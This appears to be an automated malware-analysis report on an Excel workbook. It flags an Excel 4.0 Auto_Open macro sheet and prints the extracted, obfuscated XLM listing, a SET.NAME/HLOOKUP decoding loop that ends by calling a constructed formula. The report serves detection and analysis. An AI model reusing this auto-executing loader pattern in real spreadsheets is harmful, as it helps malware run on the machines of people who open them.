Verdict: MALICIOUS
Risk Score: 140
Heuristics: 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6625 bytes |

SHA-256: 4176fc44472529c166d96edf1c07c7665276288db47bc29f598ab0112736206b

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - eLVOV
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G168
' 0018 25 LABEL : Cell Value, String Constant - avlHhUtIOo len=0
' 0018 20 LABEL : Cell Value, String Constant - bwkmQ len=0
' 0018 26 LABEL : Cell Value, String Constant - eEfRylPsYyJ len=0
' 0018 23 LABEL : Cell Value, String Constant - euvboKsj len=0
' 0018 22 LABEL : Cell Value, String Constant - gFAWoOY len=0
' 0018 21 LABEL : Cell Value, String Constant - hDJVyL len=0
' 0018 26 LABEL : Cell Value, String Constant - IlpvCmiAjJA len=0
' 0018 26 LABEL : Cell Value, String Constant - IVqBPtmaZtg len=0
' 0018 25 LABEL : Cell Value, String Constant - litljincUc len=0
' 0018 21 LABEL : Cell Value, String Constant - MBMGEg len=0
' 0018 26 LABEL : Cell Value, String Constant - mPxXHtGOthp len=0
' 0018 21 LABEL : Cell Value, String Constant - OkUroJ len=0
' 0018 22 LABEL : Cell Value, String Constant - QUbdVmK len=0
' 0018 23 LABEL : Cell Value, String Constant - qyNWLbtT len=0
' 0018 25 LABEL : Cell Value, String Constant - skkCbRzcHv len=0
' 0018 22 LABEL : Cell Value, String Constant - tcaMxZa len=0
' 0018 24 LABEL : Cell Value, String Constant - uwgAXmGsq len=0
' 0018 22 LABEL : Cell Value, String Constant - UwyDlmh len=0
' 0018 26 LABEL : Cell Value, String Constant - WtXIoXqQHVd len=0
' 0018 23 LABEL : Cell Value, String Constant - XWtxxNXN len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' eLVOV,P44,"",-233.00000000000000000000
' eLVOV,P45,"",-59.00000000000000000000
' eLVOV,P46,"",-654.00000000000000000000
' eLVOV,P47,"",-689.00000000000000000000
' eLVOV,P48,"",-421.00000000000000000000
' eLVOV,P49,"",768.00000000000000000000
' eLVOV,G80,"SET.NAME("skkCbRzcHv",0+VALUE("0"))",""
' eLVOV,G82,"SET.NAME("OkUroJ",skkCbRzcHv)",""
' eLVOV,G85,"SET.NAME("qyNWLbtT",skkCbRzcHv)",""
' eLVOV,G90,"SET.NAME("eEfRylPsYyJ",COUNTA(XWtxxNXN))",""
' eLVOV,G94,"SET.NAME("avlHhUtIOo",COUNTA(euvboKsj))",""
' eLVOV,G99,[],""
' eLVOV,G102,"SET.NAME("IlpvCmiAjJA","")",""
' eLVOV,G105,"OkUroJ",""
' eLVOV,G108,"SET.NAME("hDJVyL",HLOOKUP("*",XWtxxNXN,OkUroJ,FALSE))",""
' eLVOV,G110,"uwgAXmGsq",""
' eLVOV,G115,"SET.NAME("MBMGEg",skkCbRzcHv)",""
' eLVOV,G119,[],""
' eLVOV,G122,"MBMGEg",""
' eLVOV,G125,"QUbdVmK",""
' eLVOV,G127,"bwkmQ",""
' eLVOV,G131,"gFAWoOY",""
' eLVOV,G135,"SET.NAME("litljincUc",VALUE(HLOOKUP("*",euvboKsj,gFAWoOY,FALSE)))",""
' eLVOV,G139,"mPxXHtGOthp",""
' eLVOV,G141,"IlpvCmiAjJA",""
' eLVOV,G143,"qyNWLbtT",""
' eLVOV,G147,NEXT(),""
' eLVOV,G152,"IVqBPtmaZtg",""
' eLVOV,G155,[],""
' eLVOV,G157,"UwyDlmh",""
' eLVOV,G161,NEXT(),""
' eLVOV,G166,RETURN(),""
' eLVOV,G191,"SET.NAME("tcaMxZa",G80)",""
' eLVOV,G193,"XWtxxNXN",""
' eLVOV,G196,"SET.NAME("euvboKsj",R81C13)",""
' eLVOV,G198,"SET.NAME("UwyDlmh",206)",""
' eLVOV,G201,"SET.NAME("WtXIoXqQHVd",7)",""
' eLVOV,G205,tcaMxZa(),""
' eLVOV,G206,HALT(),""